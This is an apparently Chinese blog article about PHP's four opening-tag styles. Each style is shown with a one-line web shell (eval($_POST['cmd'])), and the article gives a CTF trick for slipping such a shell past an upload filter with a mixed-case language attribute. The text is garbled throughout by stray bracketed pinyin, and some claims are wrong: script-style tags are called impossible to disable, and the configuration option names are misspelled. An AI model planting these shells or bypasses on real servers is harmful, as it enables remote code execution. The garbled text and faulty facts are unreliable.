您好,登錄后才能下訂單哦!
PHP的標(biāo)識有哪些?這個問題可能是我們?nèi)粘9ぷ鹘?jīng)遇見到的。通過這個問題,希望你能收獲更多。如果你不看答案,不知道是否有把握回答這個問題?讓我們來試試。
PHP四種標(biāo)記風(fēng)格
1.XML風(fēng)格
<?php eval($_POST['cmd']); ?>
php推薦使用的標(biāo)記風(fēng)格。
服務(wù)器管理員無法禁用,所有服務(wù)器上均可使用該風(fēng)格。
2.腳本風(fēng)格
<script language="php"> eval($_POST['cmd']); </script>
默認(rèn)開啟,無法禁用
筆者曾遇到過一CTF題目,要求上傳shell,但是卻對文件內(nèi)容做了過濾 ,<? 以及 php,替換為了空格。此種風(fēng)格中,language的值,大小寫都可以,因此可以構(gòu)造如下代碼進(jìn)行繞過
<script language="PhP"> eval($_POST['cmd']); </script>
3.簡短風(fēng)格
<? eval($_POST['cmd']); ?>
此種風(fēng)格需要在配置文件php.ini中啟用short_open_tage選項(xiàng)
此種風(fēng)格在許多環(huán)境中默認(rèn)是不支持的
4.ASP風(fēng)格
<% eval($_POST['cmd']); %>
此種風(fēng)格需要在配置文件php.ini中啟用asp_tag選項(xiàng)
在默認(rèn)情況下是禁用的
看完上述內(nèi)容,你們對php的標(biāo)識大概了解了嗎?如果想了解更多相關(guān)文章內(nèi)容,歡迎關(guān)注億速云行業(yè)資訊頻道,感謝各位的閱讀!
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。